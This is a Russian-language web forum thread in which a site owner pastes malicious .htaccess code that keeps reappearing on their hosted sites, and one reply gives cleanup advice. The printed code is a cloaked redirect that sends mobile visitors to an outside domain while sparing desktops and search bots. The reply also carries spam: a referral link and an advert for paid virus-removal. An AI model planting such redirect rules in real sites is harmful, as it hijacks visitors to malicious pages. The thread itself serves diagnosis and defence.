Здраствууйте.На хостинге на всех сайтах прописывается в файле htaccess следующий код
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]RewriteCond %{HTTP_USER_AGENT} [NC,OR]RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]RewriteCond %{HTTP:Profile} .+ [NC,OR]RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$
http://moblao.com/e/9258 [L,R=302]
Очищал,он автоматически прописывается снова,как обнаружить и где?
ademags
02.03.2014 09:41
2 607
Пройдитесь антивирусом по папке upload, там у меня раньше частенько появлялись так называемые шелы.
рекомендую даже регнутся в ней http://w3bank.ru/go/11
конверт сумасшедший у них,у некоторых даже 1:1.
по поводу того что ставят Вам код - меняйте пароль на FTP,на базу данных,на админку и ищите шеллы по логам сервера или по логам Google Analytics если конечно у Вас он установлен.
можете попросить помощи у хостера,он сможет глянуть по логам сервера.
Очищаю сайт от вирусов и предоставляю защиту от вирусов если интересно стучи Лигин Skype Stopvirus.by